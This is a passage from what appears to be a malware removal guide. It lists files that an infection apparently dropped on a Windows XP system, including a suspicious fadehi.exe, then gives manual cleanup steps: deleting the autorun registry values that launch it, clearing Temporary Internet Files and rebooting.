    C:\ea4acb66495575d6b9f323\about_modules.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\about_if.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\pwrshmsg.dll (4 bytes)
    C:\ea4acb66495575d6b9f323\about_parameters.help.txt (9 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)
    %System%\GroupPolicy\Adm\SET3B.tmp (2 bytes)
    %WinDir%\ocmsn.log (7791 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (20 bytes)
    %System%\SET12.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETBC.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SETD3.tmp (4 bytes)
    %System%\SET1B.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (10 bytes)
    %WinDir%\inf\SET1D.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (3 bytes)
    %System%\SET1A.tmp (789 bytes)
    %WinDir%\Help\SETCA.tmp (12287 bytes)
    %System%\WindowsPowerShell\v1.0\SETBE.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (950 bytes)
    %WinDir%\SECD5.tmp (1897 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (18248 bytes)
    %System%\winrm\0409\SET22.tmp (601 bytes)
    %System%\SET36.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (6 bytes)
    %System%\SET25.tmp (2 bytes)
    %System%\SET13.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (17 bytes)
    %System%\SET14.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (10177 bytes)
    %WinDir%\inf\SET1E.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (2 bytes)
    %System%\SET2A.tmp (1281 bytes)
    %System%\SETC4.tmp (42 bytes)
    %System%\SET19.tmp (25 bytes)
    %WinDir%\ntdtcsetup.log (22691 bytes)
    %WinDir%\inf\oem10.PNF (10040 bytes)
    %System%\SET2D.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (13 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (27 bytes)
    %System%\SET33.tmp (25 bytes)
    %WinDir%\msmqinst.log (5398 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (24 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (15 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (3 bytes)
    %System%\SETB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (438 bytes)
    %System%\SET2B.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (1 bytes)
    %System%\GroupPolicy\Adm\SET39.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (3361 bytes)
    %System%\SET2E.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETD1.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (17 bytes)
    %System%\SETE.tmp (673 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (49 bytes)
    %System%\wbem\SET23.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\SET17.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (7971 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (5 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (21 bytes)
    %WinDir%\MedCtrOC.log (8910 bytes)
    %System%\config\SYSTEM.LOG (5705 bytes)
    %System%\SET34.tmp (789 bytes)
    %System%\SET18.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (2 bytes)
    %System%\SET27.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (1 bytes)
    %System%\SET11.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (1425 bytes)
    %System%\GroupPolicy\Adm\SET3A.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (11 bytes)
    %System%\SET35.tmp (14 bytes)
    %WinDir%\msgsocm.log (6541 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
    %System%\SETF.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
    %System%\SET10.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (40 bytes)
    %System%\SET26.tmp (35 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETBD.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (8 bytes)
    %System%\config\system (3251 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (57 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (2321 bytes)
    %System%\SET32.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (4 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SETBF.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (8 bytes)
    %WinDir%\imsins.log (3792 bytes)
    %System%\wbem\SET9.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (7 bytes)
    %System%\SET16.tmp (12 bytes)
    %System%\winrm\0409\SET3C.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (1425 bytes)
    %System%\CatRoot2\dberr.txt (1031 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (12 bytes)
    %WinDir%\iis6.log (139812 bytes)
    %WinDir%\comsetup.log (49682 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (19 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (61 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (10 bytes)
    %System%\SET28.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SETCF.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (5 bytes)
    %System%\SET31.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (23 bytes)
    %System%\GroupPolicy\Adm\SET21.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (601 bytes)
    %System%\SET29.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETD0.tmp (40 bytes)
    %System%\SET2C.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (4 bytes)
    %WinDir%\KB968930.log (245066 bytes)
    %System%\SET15.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (13 bytes)
    %WinDir%\inf\oem10.inf (673 bytes)
    %System%\SET24.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (10 bytes)
    %System%\SET1C.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (12 bytes)
    %WinDir%\FaxSetup.log (53338 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %WinDir%\tsoc.log (79170 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (5 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (11 bytes)
    %System%\SETD.tmp (1281 bytes)
    %WinDir%\netfxocm.log (9089 bytes)
    %System%\SETC.tmp (35 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (601 bytes)
    %WinDir%\ocgen.log (71000 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (9 bytes)
    %WinDir%\inf\SET37.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (24 bytes)
    %WinDir%\inf\SET38.tmp (12 bytes)
    %System%\SET2F.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (22 bytes)
    %System%\SET30.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (5 bytes)
    %WinDir%\tabletoc.log (2313 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC0.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (12 bytes)
    %System%\GroupPolicy\Adm\SET1F.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (6 bytes)
    %System%\GroupPolicy\Adm\SET20.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (2 bytes)
    %WinDir%\assembly\tmp\3LPSVY14\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\VEHKNRUX\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\FY147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\XFJMPSVY\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\2MPSVY14\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\RADGKNQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\CX148BEH\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\3MPSVY15\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\XFILORVY\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\L47ADHKN\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\HZ258BEH\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\O7ADGKNQ\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\VDGJNQTW\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\K258CFIL\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\YGKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\ATWZ258B\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\J258CFIL\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\7QTWZ258\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\0JMPSVY1\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\RBEHKNRT\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\WEHKNRUX\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\TBEILORU\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\GY147ADG\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (7385 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (68628 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (1683 bytes)
    %Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb (4108 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe."

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe "

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
